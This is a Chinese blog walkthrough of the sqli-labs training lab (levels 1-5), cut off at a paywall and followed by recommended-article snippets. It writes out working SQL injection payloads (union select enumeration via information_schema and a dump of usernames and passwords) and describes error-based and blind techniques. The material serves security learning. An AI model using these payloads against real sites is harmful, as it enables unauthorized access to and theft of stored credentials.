从零开始的sqli-lab(1-21)

已于 2024-01-20 14:54:16 修改
阅读量1.1k 收藏 23
点赞数 20
分类专栏: 从零开始的CTF之路 文章标签: 数据库 mysql
于 2024-01-13 21:34:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51248658/article/details/135574884
版权
文章详细描述了一系列SQL注入攻击的过程,包括字符型和数字型判断,闭合符号识别,盲注(时间盲注和布尔盲注)、报错注入以及针对不同部分(如数据库名、表名、列名)的数据获取。作者使用burpsuite等工具进行演示,涉及update语句注入和头部、cookie注入的案例。
摘要由CSDN通过智能技术生成

文章目录

less-1

?id=1’起手,出现报错,存在sql注入

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to usenear ''1'' LIMIT 0,1' at line 1

这里其实就能看出这是一个字符型,因为1'后面又多出了一个单引号,这是一个单引号闭合的字符型,所以后续操作接着做就行了。

?id=1' order by 3--+   //这里要一个一个接着试,当order by 4时,会出现报错,所以列数为3
?id=-1' union select 1,2,3--+  //查看回显位,注意要用一个不存在的id,不然看不出来
?id=-1' union select 1,2,database()--+  //爆库名为security
?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+  //爆出security库下所有的表名
?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+  //爆users表中的列名
?id=-1' union select 1,2,group_concat(username,'--',password)from security.users--+  //爆数据

less-2

仍然?id=1’起手,发现报错,存在sql注入

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

接着再去判断是字符型还是数字型
输入?id=1 and 1=1--+时,页面正常回显,接着输入?id=1 and 1=2--+时,发现页面无回显,可以判断为数字型,接着重复与第一关的步骤即可完成。

虽然后续与第一关一样,但是别偷懒,熟能生巧。

less-3

同第一关一样,报错信息中能看出是')闭合的字符型,同样步骤不再赘述。

less-4

在输入?id=1'后发现页面正常,然后我又接着尝试?id=1''两个单引号,页面还是显示正常,再次尝试?id=1"双引号,终于报错了

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

这种引号特别多的情况下,慢慢看,一层一层地将外面的单引号与自己输入的双引号删掉,然后就剩下")了,这就是闭合符号,这是")闭合的字符型
后续工作也和第一关一样了

less-5

?id=1’起手,发现报错,存在sql注入

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

这里可以看出是单引号闭合的字符型,但是这次只会显示You are in...........
所以这次应该是盲注了,其实也可以用报错注入。但为了练习盲注,还是坚持用繁琐的方法完成吧。
这里可以用时间盲注或者是布尔盲注,时间盲注可以用脚本或者burp suite完成,布尔盲注用burp suite就能完成

因为本人太久没碰python了,而且在试着用burp suite爆破的时候,正确返回包大小不同而且还分布在中间没法直接看出来,不知道问题出在哪里,所以就演示手工注入了<

最低0.47元/天 解锁文章
JazzYu
关注
专栏目录
从零开始sqli-labs:十一关
asdushf的博客
12-12 755
sqli-labs第十一关 文章目录sqli-labs第十一关前言判断注入类型 前言 十一关开始出现登录框了 判断注入类型 这里注入类型的判断和前面差不太多,关键还是要注意引号的闭合。 上下两边都输入1,发现登录失败上边输入 ...
sqli-lab 11-20
qq_48413575的博客
01-11 2243
sqli-lab 11-20
无痕渗透“INSERT INTO”型SQL注入
逆水行舟
12-30 2万+
原文链接:http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html 在某个寂静的深夜,你徘徊在一个网站中,其中包含一个可提交form,需要你输入一个昵称。你输入了一个单引号作为你的昵称,网站返回了一条异常信息:“You have an error in your SQL syntax”。机智的你很快明
MySQL java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax 关键字异常处理
Yeats_Liao的博客
06-21 2万+
MySQL java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax 关键字异常处理
简单的联合SQL注入总结
qq_51763493的博客
09-11 60
1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where tabe_name='你想查的表' #1' and 1=2 union select xxx,xxx from 表 #
SQL 注入漏洞(五)union 联合注入
不秃头的程序Yang
06-11 2022
1、联合查询的错误方式 4、联合查询注入获取敏感信息 6、通过 information_schema 获取表
sql注入中常见的报错信息
sun的博客
10-21 4750
sql注入是我们常见的ctf的web类型题目,因此我们在做这类题时经常在页面上返回错误信息,因此熟悉一些常见的sql注入信息是很重要的,下面我介绍一些自己常遇到的mysql报错信息。 我们在页面上返回的错误信息不仅仅只有mysql返回的,可能还有服务器返回的,因此我仅仅对mysql返回的错误信息进行总结 . 1,报错信息 The used SELECT statements...
Sqli-lab教程-史上最全详解(1-22通关)
wangluoanquan111的博客
04-20 818
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
Python面试题大全SQLi第八关,Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 342
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 854
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库
Sql-lab全解_sqllab
2301_77033340的博客
04-12 793
这里推荐在password注入,因为判断密码和账户的正确性,正确才回显,如果这里在username注入则比较麻烦经过测试这里回显位为2位得到数据库名称,和当前表名称得到表列得到数据。
SQL注入漏洞详解
无言道的博客
03-13 1万+
文章目录SQL注入漏洞原理SQL注入内容注入条件判断注入SQL注释符与注入流程 SQL注入漏洞原理 漏洞原理   web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑。黑客利用此漏洞执行恶意的SQL语句,如查询数据、下载数据,写webshell、执行系统命令以此来绕过登录权限限制等。 检测方法   可以利用sqlmap进行SQL注入的检查或利用,也可以使用其他SQL注入工具。也可以手工测,利用单引号、and 1=1以及字符型
mysql数据库的You have an error in your SQL syntax问题
热门推荐
有志者一定行
10-21 2万+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order,create_time,modify_time,modifier) values ( 6491585399732387
web安全与防御---2.DVWA之SQL注入
老辉辉的博客
04-01 5553
首先登录DVWA主页: 1、修改安全级别为LOW级(第一次玩别打脸),如图中DVWA Security页面中。 2、进入SQL Injection页面,出错了。(心里想着这DVWA是官网下的不至于玩不了吧。。) 网页错误提示:Parse error: syntax error, unexpected '[' in C:\xampp\htdocs\DVWA\vulnerabilities
4.网络编程
weixin_45476535的博客
09-14 407
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Oracle EBS中AR模块的财务流程概览
qq_36620997的博客
09-14 716
AR模块的财务流程概览
【学习笔记】手写 Tomcat 三
LearnTech_123的博客
09-12 1090
响应动态资源不需要写文件名了,只需要写功能的名称即可。比如登录功能,可以定义名称为 doLogin
55 mysql 的登录认证流程
最新发布
970655147的专栏
09-15 594
这里我们来看一下 mysql 的认证的流程我们这里仅仅看 我们最常见的一个 认证的处理流程我们经常登录的时候 碰到各种异常信息大概的流程是这样客户端和服务器建立连接之后, 服务器向客户端发送 salt然后 客户端根据 salt 将客户端传入的密码加密之后, 以及相关登录信息传递给服务器然后 服务器进行验证, 验证失败, 响应对应的错误信息给客户端服务器发送 salt 的信息如下客户端发送的认证请求如下服务器响应的认证失败信息如下。
sqli-lab安装
09-05
您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds....
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值